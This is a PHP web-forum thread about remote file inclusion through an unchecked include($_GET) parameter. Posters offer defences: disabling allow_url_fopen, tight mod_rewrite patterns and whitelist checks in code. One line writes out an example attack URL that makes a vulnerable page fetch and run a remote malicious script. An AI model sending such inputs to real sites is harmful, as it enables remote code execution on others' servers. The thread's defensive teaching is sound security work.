Forum Moderators: coopster
For example, I saw one website where the URLs were all index.php?a=filename and index.php was a template with:
include($a);
in the middle. If someone formed a URL such as index.php?a=http://www.theirdomain.com/maliciousscript.php, PHP would fetch that remote script and execute it on the server, and problems would ensue.
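Worth noting as a first line of defense (my addition, not something the poster mentioned): include() can only fetch a remote URL at all when PHP is permitted to open remote files. Turning that off in php.ini blocks the remote half of this attack, though a malicious *local* path can still be included, so it's no substitute for validating the value:

```ini
; php.ini - stop fopen wrappers from opening remote URLs,
; which also stops include() from pulling in remote scripts
allow_url_fopen = Off
```

Newer PHP releases (5.2+) also have a separate allow_url_include directive that is Off by default.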
With a few new sites that I am designing, I will be doing the very thing outlined above, based on advice that I received here at WW [webmasterworld.com].
Now, I am 'cloaking' my urls using mod_rewrite, making them all .html files. So, this in effect would hide the fact that my site even uses anything dynamic, let alone PHP. But still, I'm sure there may be ways to figure this out, is there anything else that I can do to be sure that I am safe?
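For reference, the kind of rewrite I mean looks roughly like this (a sketch with made-up names; the pattern would have to match your own URL scheme):

```apache
# .htaccess - serve /somepage.html from index.php?a=somepage
RewriteEngine On
RewriteRule ^([a-z0-9_-]+)\.html$ index.php?a=$1 [L,QSA]
```

A side benefit of keeping the captured pattern tight ([a-z0-9_-] only) is that a rewritten request can't smuggle slashes, dots, or a scheme like http:// into $a. But that only covers the rewritten URLs; anyone can still request index.php?a=... directly, so the script itself still has to validate the value.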
Personally I use a database to store the content, which means I only use hard-coded include() statements for function libraries and to initialize variables/constants.
If you feel using files is necessary for your projects, I would suggest keeping a text file listing every filename your script is allowed to call, then checking that the GET-passed value appears in that file before include()-ing it.
As this text file is not intended for publication, you can adequately protect it from the HTTP server with a .htaccess file, for example (assuming you're using Apache).
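A minimal sketch of that idea (my own illustration, not the poster's actual code; pageIsAllowed() and the whitelist path are made-up names). The whitelist file holds one permitted page name per line and lives outside the web root:

```php
<?php
// Check a requested page name against a text-file whitelist
// (one allowed name per line, stored outside the web root).
function pageIsAllowed($page, $whitelistFile)
{
    // file() returns the file as an array of lines;
    // trim trailing newlines and drop blank lines
    $allowed = array_filter(array_map('trim', file($whitelistFile)));

    // strict comparison: the request value must match an entry exactly
    return in_array($page, $allowed, true);
}

// Usage in a template script (hypothetical paths):
// $page = isset($_GET['a']) ? $_GET['a'] : '';
// if (pageIsAllowed($page, '/home/site/allowed-pages.txt')) {
//     include "{$page}.php";
// } else {
//     include 'error.php';
// }
```

Because the check is an exact string match, values like ../etc/passwd or a full http:// URL simply aren't in the list and get rejected.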
How's this for a solution? (picked from alistapart)
$acceptable_pages = array(
    'test',
    'another',
    'photos',
    'projects'
);

// get the page from the URL
$page = $_REQUEST['page'];

// make sure the page is in the acceptable pages array
if ( in_array( $page, $acceptable_pages ) )
{
    include( "{$page}.php" );
}
else
{
    // 404 page
    include( "error.php" );
}
I would include this in my template.php file, for example. I imagine that seeing this very basic code is making you both gnash your teeth, but it seems to be a simple and effective solution.
It seems kinda thin and inelegant to me as well - however, I am class="rookie" with PHP, and it does get the job done.